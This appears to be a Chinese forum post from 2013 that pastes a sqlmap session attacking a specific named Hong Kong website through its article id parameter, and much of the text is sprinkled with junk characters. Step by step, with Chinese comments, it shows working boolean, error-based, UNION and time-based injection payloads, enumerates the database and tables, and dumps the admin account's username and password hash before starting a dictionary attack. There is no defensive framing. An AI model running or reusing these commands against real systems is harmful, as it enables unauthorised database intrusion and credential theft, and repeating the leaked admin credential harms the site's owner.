D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 @) V, ^% f. @& S: U5 L
ms "Mysql" --current-user /* 注解:获取当前用户名称
) N( q1 c: O5 |* a5 o8 D sqlmap/0.9 - automatic SQL injection and database takeover tool. b+ l* g& k, ]& r, ]3 y
http://sqlmap.sourceforge.net starting at: 16:53:54: n6 d4 t9 Z4 B5 V* a7 b1 Y0 G8 S% R
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
5 j, Y) b, V' i0 m session file
3 O! C) ~0 W" o5 `2 d, J[16:53:54] [INFO] resuming injection data from session file
- M" C8 ~" a, l# E$ {[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
& R) ^8 g- i R% x n[16:53:54] [INFO] testing connection to the target url
$ \7 F0 ]* u7 N$ k7 c! Wsqlmap identified the following injection points with a total of 0 HTTP(s) reque' x* n L1 A2 ^
sts:1 m' d% T' {3 R5 N, K
---
/ U$ Y& v' d0 }8 p3 lPlace: GET% G3 U; u1 y3 ?0 Y3 D8 p3 h/ g# z0 |
Parameter: id
0 e" t" Y! f) i3 D! J# v7 i Type: boolean-based blind6 f" M0 J! @4 o; d# }: v
Title: AND boolean-based blind - WHERE or HAVING clause) z! }/ F: r. o3 m: W7 u" x- {% w# `
Payload: id=276 AND 799=799
6 y0 K% Q* w* P: \' H0 e Type: error-based4 R8 A, l& I# T# r3 O9 Q2 n, G! n
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 l2 m/ A1 B: |5 a
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,' J/ ^3 ^( [' U
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
( G% n4 z: J* L# l),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
1 {! K; ^8 ~9 [ Type: UNION query
8 V- U& g: i+ j/ u% y Title: MySQL UNION query (NULL) - 1 to 10 columns' T: \) U0 P' o2 I, h
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR9 L8 [5 Z2 L+ ]3 z. C+ h6 R' E
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),$ P% o& Q) W+ s D9 _
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#. P$ g5 B* C9 V' W( J
Type: AND/OR time-based blind: c% A3 }0 {; J7 b
Title: MySQL > 5.0.11 AND time-based blind: {$ @4 r) [. C
Payload: id=276 AND SLEEP(5), t; R, G8 ~( K* C* c
---4 Y! ^. C+ \9 l# n2 R* f
[16:53:55] [INFO] the back-end DBMS is MySQL. `$ B/ T8 I3 N: X
web server operating system: Windows
# Q. Q0 D4 s k% Vweb application technology: Apache 2.2.11, PHP 5.3.0: w- F" Z J9 x0 Z, g2 B' O
back-end DBMS: MySQL 5.0# D( ?6 C! n/ H; t
[16:53:55] [INFO] fetching current user
: l, e9 o7 ]" V, gcurrent user: 'root@localhost'
8 b- C) B8 g2 c' |3 j[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou% a4 K0 _' x/ \* Q
tput\www.wepost.com.hk' shutting down at: 16:53:58; G/ Z7 {+ x. t# U/ S- Z
, ~* Y7 i: A! f2 W" L/ f. n5 e6 u& fD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db& D7 z; [+ }- G
ms "Mysql" --current-db /*当前数据库
5 c% R0 _, g4 G8 q, G% z9 x sqlmap/0.9 - automatic SQL injection and database takeover tool
9 V! _* p/ _" o( d+ l' }/ Y http://sqlmap.sourceforge.net starting at: 16:54:16
1 O6 j5 w+ x9 _% q) @( O[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
8 I4 ?0 M4 g' y session file/ P* A4 G3 [/ F$ c. X
[16:54:16] [INFO] resuming injection data from session file# Z( q9 K2 u- g+ q3 g
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
5 ` e. r' m( |( e( K. R7 j[16:54:16] [INFO] testing connection to the target url
; H) f9 A2 v" {/ M! [' I' Z1 ysqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ e# x- u8 ]- B3 ]9 T* G' ists:
" v9 F7 I u' e* I: U+ s/ `" q7 a---3 ~4 g i. [9 R) c- T2 |0 h
Place: GET* d# ~9 P! _- [# `/ c5 p
Parameter: id
4 x/ k- T& L1 {: ^( r Type: boolean-based blind5 N" k6 @9 r, H( w" U
Title: AND boolean-based blind - WHERE or HAVING clause
- D7 G4 ~# o1 M# p4 b8 w$ T Payload: id=276 AND 799=799
" D/ l8 h. R0 u: X& h Type: error-based3 ~/ \& p) ]) {* P# p
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, ?5 n8 U$ U6 O8 S
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% p L6 f" a$ a: ]1 Q
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58) e2 R Y* U+ J9 i, P
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
" Z- Z- Y1 N: k; p$ F Type: UNION query
6 T) w. Z1 c2 @0 D c Title: MySQL UNION query (NULL) - 1 to 10 columns
% a! G3 n5 _8 V# b& @3 u Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
2 }7 c* O2 D0 e8 g8 K: `5 f(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),+ x" v3 h& j5 o( P: w
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
0 K) Y) M# O1 D; S5 d8 Q% u Type: AND/OR time-based blind
# [: h" Z$ r7 X; X- R6 t4 u+ [ Title: MySQL > 5.0.11 AND time-based blind) l4 [( s! A; U$ c" Z7 ^( {5 v
Payload: id=276 AND SLEEP(5)8 {# O" ~2 M o# J3 i8 U7 X
---; h1 C0 o+ c9 P8 v6 e) J4 T9 b
[16:54:17] [INFO] the back-end DBMS is MySQL" H: g+ F& ~* s7 ?
web server operating system: Windows& ]5 o' Y, A& l4 V
web application technology: Apache 2.2.11, PHP 5.3.0) Q' T+ [; q" Y- M* v6 p' D
back-end DBMS: MySQL 5.0. P0 B" ?5 F* ?! [
[16:54:17] [INFO] fetching current database
8 l/ \* e' S: E0 m2 `$ {7 Acurrent database: 'wepost'
# k9 R! \% C( o; p" c[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou, q& V* T% r( h( H
tput\www.wepost.com.hk' shutting down at: 16:54:18
2 g) S; h# H$ P. |7 qD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db* n* m9 @, q L2 y8 V
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名# ^2 V" w' `6 b3 H
sqlmap/0.9 - automatic SQL injection and database takeover tool) m n- | X- y( s+ i
http://sqlmap.sourceforge.net starting at: 16:55:25+ P8 q! ?8 H7 R. V
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
3 B* K. L# K1 e$ o w9 z0 i session file5 M# a! }9 m2 B3 W: A5 X
[16:55:25] [INFO] resuming injection data from session file
% z- b4 i3 y: N& H" W[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
& _& R' ~% Y, g- g[16:55:25] [INFO] testing connection to the target url
; E( c( K3 ~& K( y. V6 Psqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ E( }. G# p5 [& K5 C: psts:# p/ r n( q* d" ] F% `; _3 B0 q
---
% d, H7 K: k2 _; b. k, VPlace: GET
- t$ f8 ~/ i* GParameter: id
. C. }2 A: H/ T# P Type: boolean-based blind
/ U7 h$ s" g, d8 v" q( D Title: AND boolean-based blind - WHERE or HAVING clause, D8 I: H, C" N) ]0 N9 O
Payload: id=276 AND 799=799
" ?- w9 L& j ?6 ]. Z q Type: error-based
5 g* u, l8 x/ a Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause) z5 Q/ s l/ n* B" e I
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
* D% M! D( L$ j! M; |120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58# l$ r [2 J7 a# a$ \! ^
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
+ J, y3 F0 m5 I0 x Type: UNION query
* l& D/ J3 t9 J6 e+ R0 o Title: MySQL UNION query (NULL) - 1 to 10 columns
! z' c8 O; s! ~* d* N( K! T9 U Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
1 G/ @: {8 ]; V(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
" W! V% _0 w$ `7 XCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) b* z6 l: J1 z' h0 U$ H
Type: AND/OR time-based blind
1 i8 l8 J! a; j Title: MySQL > 5.0.11 AND time-based blind1 y- |7 y& y- w
Payload: id=276 AND SLEEP(5)0 m0 b- u$ ?( {5 r+ B
---
5 Q/ P0 @, K5 ~; |) f6 Z" J[16:55:26] [INFO] the back-end DBMS is MySQL
. w2 p" W) y4 H% M- {web server operating system: Windows
( o6 x2 A& {# }5 r' n: O1 ]1 Eweb application technology: Apache 2.2.11, PHP 5.3.0
1 B! u. d9 U/ u) j% L$ H9 p; Aback-end DBMS: MySQL 5.0
5 R4 d% m K' u/ _6 u3 p0 U[16:55:26] [INFO] fetching tables for database 'wepost'
% ~6 N+ p$ W, U& z5 g% `[16:55:27] [INFO] the SQL query used returns 6 entries
1 B$ |0 Z) O( j: U3 Y0 \- d0 ZDatabase: wepost' z; J4 t2 j G0 ^, g- d- ~
[6 tables]( t% P% p* i( P+ |" G
+-------------+
9 B: v" |8 T0 r* ?" K# c/ r- H| admin |, {/ Z! M' i/ E4 c0 [4 [: h
| article |. a& \3 I1 Q5 U; h, U7 K/ E) U2 ~
| contributor |
. z8 o$ f ~+ q| idea |
: [" {$ M$ I' C, R| image |
) v( J% n1 Z! H2 y3 M| issue |
* X+ k. \. p b! D1 u& i2 e+-------------+
* D, L' Z; ~4 G: b$ Y[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou7 K0 M6 B+ }# e. ^+ g
tput\www.wepost.com.hk' shutting down at: 16:55:334 S% q \: P. x8 ]+ X0 o* R1 I( c
# s' h; @/ Z" g& |" ?0 k
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
& g3 A+ p7 R2 e8 {$ ~ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名 R: H$ s$ g$ A& g9 q' O
sqlmap/0.9 - automatic SQL injection and database takeover tool
, U" _$ l: |0 s. i# u http://sqlmap.sourceforge.net starting at: 16:56:06
0 k! e# `$ j9 @4 isqlmap identified the following injection points with a total of 0 HTTP(s) reque' x& G G0 A' ?3 ?% L& L
sts:
7 b% g$ z0 B) t9 p# s- h---- [, V3 u5 A4 j0 Q
Place: GET
$ y+ {3 Z) E9 x! [! R. |Parameter: id
|- f3 c9 O* A/ l2 _* X% g) E Type: boolean-based blind
$ p. J& ]2 R; Q* n) P& s Title: AND boolean-based blind - WHERE or HAVING clause8 g. b$ i! I5 j7 y# d: F& R0 d* d
Payload: id=276 AND 799=799; c W6 S6 V: C7 P& y1 M
Type: error-based8 `2 I k9 L& e) D
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
4 D2 S/ H& I4 V6 a) i3 k. ^# v" S Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,' y T1 I8 i: i$ f$ X% v0 u
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58" _* J1 G: v/ |9 U7 B. y/ @; N+ m
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)2 A$ r* c/ u0 U1 a/ p
Type: UNION query9 ~( f, v- o! [4 ]
Title: MySQL UNION query (NULL) - 1 to 10 columns& c$ o- U; k1 I. t5 ^8 p- \' c/ U6 C
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
2 _/ b0 h2 d) @+ u9 {(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),4 z2 }$ U1 r0 w6 ~! l* e; k
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
6 O3 Z" Z; A0 P( | Type: AND/OR time-based blind" c" H9 d3 g8 ~2 k
Title: MySQL > 5.0.11 AND time-based blind6 b6 r- Z$ J; V4 [4 `
Payload: id=276 AND SLEEP(5)
+ Q- ^ l4 }" v+ i---
7 U$ X S# v1 y/ v s# M, Vweb server operating system: Windows
" y4 {3 l( b" d7 w' Vweb application technology: Apache 2.2.11, PHP 5.3.0
+ z f7 c" j' |9 i! |back-end DBMS: MySQL 5.0
& E6 v( c# i& T[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
: C6 y9 S3 `$ x: T \, T9 cssion': wepost, wepost* D7 ]( N" l; i6 o7 ^( Q3 @
Database: wepost
/ [4 W* F, ? A1 H8 W7 U/ ^! qTable: admin
5 S$ D: D. A- D% @) g$ c" y[4 columns]
. f- ~( b' f/ Z" g* I+----------+-------------+0 D% m) A' _% j! @( r7 Q/ r
| Column | Type |& i7 V9 ~) U( a8 }
+----------+-------------+0 u- T6 O' C7 C, x1 s1 K) z
| id | int(11) |
# W; I0 o" r: t| password | varchar(32) |. U7 e; M: t; l# |+ B
| type | varchar(10) |
1 ^+ y* S$ w& _3 K| userid | varchar(20) |0 `" G$ j( ]. A* C- v5 Z5 y
+----------+-------------+0 v; F. v7 O* d" P/ \
shutting down at: 16:56:19# w5 }7 c0 V; M6 g- ~) L- M( F
7 |1 k% r/ U/ B3 P2 D! q4 }: K( w
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
. a' N7 ]% `, Oms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
5 {% Y' ^- k _ S) l5 ~ sqlmap/0.9 - automatic SQL injection and database takeover tool
0 `2 ] C s- x6 w http://sqlmap.sourceforge.net starting at: 16:57:14
2 z2 z ^6 C3 x( Rsqlmap identified the following injection points with a total of 0 HTTP(s) reque$ v1 J `( o- P$ ]* E. E0 I
sts:
# o' B( f, V8 V6 ~" A# B& \, C2 A0 k---$ E; X9 t0 {- \( g8 L& ?) l
Place: GET
$ y9 m6 s* f' b) y! L+ W2 a. \Parameter: id5 a* I3 l( O: p K+ b1 o4 ]
Type: boolean-based blind9 V% Y% [1 \9 r3 V0 R$ |
Title: AND boolean-based blind - WHERE or HAVING clause
$ d7 L" Z9 X; ^: b: K& W$ z Payload: id=276 AND 799=799
- d7 C* [! |0 @9 B9 B Type: error-based
1 y9 E' @; }7 b F" U Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause- s' T) S! `) a L0 H
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
; Q7 F( q* \) ]% a* W8 K120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
4 M# G0 a) l6 l8 L6 j& g% w$ z1 `),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
9 T; Z" l; X9 I Type: UNION query
8 q% }" R! U0 z' \2 I3 [# Q0 v Title: MySQL UNION query (NULL) - 1 to 10 columns5 H. |8 ?, C* H& j8 [! [
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR8 _- C+ D/ I4 i
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
3 k* ?6 @ w }CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ c8 C& E$ s: a5 q# _ o' T
Type: AND/OR time-based blind8 @6 \4 t! R3 E+ u' }1 a
Title: MySQL > 5.0.11 AND time-based blind- x4 `/ a/ A8 P) ^" F
Payload: id=276 AND SLEEP(5)
* I* v7 y# S- m8 e7 |! ]: ^---
* v( G! F- w3 A ^' U) fweb server operating system: Windows
3 @- V+ P; \7 K2 ]; Bweb application technology: Apache 2.2.11, PHP 5.3.09 m8 p# @) z4 S3 ~
back-end DBMS: MySQL 5.0; z& u: W0 y9 c1 b( T
recognized possible password hash values. do you want to use dictionary attack o. [ I& m5 J8 y
n retrieved table items? [Y/n/q] y0 Q+ m" _+ f6 k& |
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]8 P) X0 ?: S) B9 I0 d' V: t
do you want to use common password suffixes? (slow!) [y/N] y
9 t( E. s. `. P/ {# @Database: wepost2 a1 \% w0 V* R! q6 _
Table: admin+ p& ? I, @4 D3 s' a; U
[1 entry]
8 ?' C1 [0 [# B2 @" T+----------------------------------+------------+, x7 Q, t/ K( Z5 b0 x1 Q4 k1 I7 a
| password | userid |
. a. y% e1 u Y) b6 P& l: ^' W n9 U+----------------------------------+------------+2 o2 Y8 o2 G1 {# E% a0 w. r% Y
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
1 n3 \' U8 I) j' w0 J1 h* I, R+----------------------------------+------------+
- D2 m d0 P4 w# x6 z0 A shutting down at: 16:58:14$ P; C& N0 @' T6 F S2 Y; t; @6 O
( \8 d0 p8 H5 _' OD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对